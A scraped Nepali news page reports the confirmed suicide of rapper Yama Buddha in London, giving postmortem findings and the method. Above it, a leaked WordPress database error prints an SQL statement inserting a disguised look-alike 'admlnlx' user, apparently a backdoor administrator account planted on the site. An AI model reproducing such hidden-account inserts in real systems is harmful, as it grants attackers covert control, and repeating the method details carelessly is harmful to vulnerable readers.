WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwukhJ.ALPfRrHATvghWZ1BMa55wyD/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-20 06:30:17', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ५-
नेपालका चर्चित र्याप गायक यम बुद्धकोे आत्महत्याबाटै मृत्यु भएको पुष्टि भएको छ। पोष्टमार्टममा सहभागी चिकित्सक टोलीले यम बुद्धको परिवारलाई यो जानकारी दिएको हो। यम बुद्धकोे शव लण्डनस्थित आफनै घरको बाथरुममा गत शनिवार झुण्डिएको अवस्थामा फेला परेको थियो।
पोस्टमार्टम रिर्पोटमा यम बुद्धले मदिरा पिएको देखिए पनि लागू औषध सेवन नगरेको देखिएको छ। रिपोर्टमा बङ्गारा अलिकति सरेको पाइएको छ। तर यसबाहेक कोठामा यम बुद्धले आफनो पासपोर्ट टुक्राटुक्रा पारेर च्यातेको भने भेटिएको छ। उनले पासपोर्ट च्यात्नुको कारण भने खुल्न सकेको छैन। उनले किन आत्महत्या गरे र उनमा डिप्रेसन थियो या थिएन भन्ने अनुसन्धान हुन बाँकी छ।
उनी शुक्रबार राति १२ बजेतिर काम सकेर घर आएका थिए। सुत्नुअघि उनले श्रीमतिसँग वाइन पिएका थिए। शनिवार बिहान ६ बजेतिर उनी झुण्डिएको अवस्थामा बाथ रुममा भेटिएका थिए।
नेपाली गीत,संगीत क्षेत्रमा र्याप, हिपहप गीतमा बेग्लै पहिचान बनाउन सफल गायक थिए यम बुद्ध।हाल उनको शव परिवारले नेपाल लैजान चाहिरहेका छन्।